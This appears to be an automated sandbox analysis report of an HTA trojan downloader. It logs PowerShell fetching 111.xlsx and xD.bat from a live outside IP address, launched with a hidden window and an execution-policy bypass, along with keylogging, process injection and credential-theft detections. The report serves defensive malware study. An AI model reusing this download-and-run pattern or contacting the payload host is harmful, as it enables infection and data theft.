Data received	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
Data received	eGPOrnfIRdG2TwydecbFzwsBxkxkkhbBfd2LOD8OtD81t4oYZA1D6L9S9fmeZjNLxXYS0XMozLd+mFt1P58ofUOVzhoUSMwVfF8HPp3HqpdnO+9mLXzYimztfqQEFUD7yer+ABRae4WWEISWp94Z0qMJC5iLH61vZppENyqs03QRybwgnqllTOliTwRtq8Uk0NuJR79qb5D3gXb2TBqMeXSCXQuC0yyYd9VHSDbnGtX6gyn9mI/w+IDkE8hD8iWbgsWw4qeg5AoTnv34Vjp/jGQ1IWHz4H1F3ylWxBdgqAErHc5mMBYrUbBEex4ASRU19EA6JAn/1niQNmp6ZVNIxBHrPcxPrbPyTgMxfXz+9rHlBYaSZRNS4j8kSPpfMjNMeh26o6AuStcDTpbjqiwZCXRYBdJYsB6MKnt9KMVYioytIiNS3Ia9ldoHxg8fVzwRlnQuZy/0f7u4dc3M55cjy2gItG+bFMv3NLH4+xp/soZdnFl7X/PQ1DqEgV7mQJ3sgb3LDmV02m0PgK7ZnGeJzxMUu2V4NE+JDYsDuXPHmsm9lOlo9XrwKKMzO7skJCLO03PMIWZpJrAgawLt3NKt0OkwrTn7qgi3Nw+D2I89sKe3batBVwtQu2Wm8wfg2+u/U7gAgr3KlgmTF8fg6ZHspcFBmt0nJ1shhP4diVtyEj2bpr8DYRS8mgkCeVSVhks99enKRZv3yVtBTM7hEqHVg/Uij9/QN9c/1xNIYtHrsrxJgbFRiD3ocRWdY2iGQ2WfHg8XgRA4o4a60U5RpWzJnct7gEzjb1j48nw3/bsFbfip8iSS6KWEA3ih3+Q7xTT3HQ+tAbLKqXp4GW/p+v8k0f7b+41/8D8gnRy/I2fwIV+0sx8oVY7bN6pdZr9Ogx7uPike6YNkCJXhqNw2vVc6R9i00ExLNgOZP8xT8jDS+yOLi5ACPHc1wRnxWokwGxiNlpc7UAlEwGv8W2Kx2mZcPwDC9tkNnX5tMq2dETGEK5NFwJVxH0h8OgvJtZruwJQMkbhsTPAvwsKMLUCnBUwpSN+cRj9Pk0P0TEGUH2F2izt0MvhMzqrNGHdQCNCrTV2/POL9zjG3gJuS2kMQmHc6aw3EvdzDn1EysvhXAm1/643HNNN00ow+bVOPklDi8zQCafQhD+VcW2VkjjuXp0mYUWg5TXNwuHCFcnCSXUktJZm1Ntco1PWjuAVO05s8B99uP9qoYc+ZXfbaIBDMakNRunlXPRT4QlvuNtuiaoRRQQMQyTeY0JTnS7CC0e4avbZLct9QBaPZRqggACqL

Poweshell is sending data to a remote host (2 events)

Data sent	GET /111.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive
Data sent	GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 9, 2024, 11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 9, 2024, 11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Communicates with host for which no DNS query was performed (1 event)

host

193.222.96.124

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Roaming\111.xlsx
file	C:\Users\test22\AppData\Roaming\xD.bat

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExW May 9, 2024, 10:54 a.m.	thread_identifier: 0 callback_function: 0x00000000ff8fae10 hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00000000ff850000	1	262505	0

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send May 9, 2024, 11 a.m.	buffer: GET /111.xlsx HTTP/1.1 Host: 193.222.96.124:7287 Connection: Keep-Alive socket: 1436 sent: 77	1	77	0
send May 9, 2024, 11 a.m.	buffer: GET /xD.bat HTTP/1.1 Host: 193.222.96.124:7287 socket: 876 sent: 51	1	51	0

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\111.xlsx
parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\xD.bat"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\xD.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3000 resumed a thread in remote process 2052
NtResumeThread May 9, 2024, 11 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2052	1	0	0

Creates a suspicious Powershell process (3 events)

option	-w hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Cynet	Malicious (score: 99)
Skyhigh	HTA/Downloader.f
ALYac	VB:Trojan.Valyria.7482
VIPRE	VB:Trojan.Valyria.7482
Arcabit	VB:Trojan.Valyria.D1D3A
ESET-NOD32	VBS/Agent.QVR
McAfee	HTA/Downloader.f
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.7482
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	VB:Trojan.Valyria.7482
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft	VB:Trojan.Valyria.7482 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPLT
FireEye	VB:Trojan.Valyria.7482
Ikarus	Trojan.VBS.Agent
Google	Detected
Avira	VBS/Dldr.Agent.VPLT
GData	VB:Trojan.Valyria.7482
Varist	VBS/Agent.AZC!Eldorado
MAX	malware (ai score=84)
Fortinet	VBS/Agent.BSD!tr
AVG	Script:SNH-gen [Drp]

5.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All